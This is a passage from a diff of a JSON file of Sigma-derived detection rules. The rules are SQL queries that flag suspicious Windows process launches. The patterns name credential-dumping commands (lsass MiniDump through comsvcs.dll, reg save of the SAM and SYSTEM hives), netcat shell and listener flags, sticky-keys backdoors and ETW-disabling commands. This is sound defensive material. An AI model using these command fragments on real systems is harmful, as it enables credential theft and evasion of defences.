'\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove 
forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program 
Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur 
Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by 
Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE 
'%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": 
"proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" 
cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * 
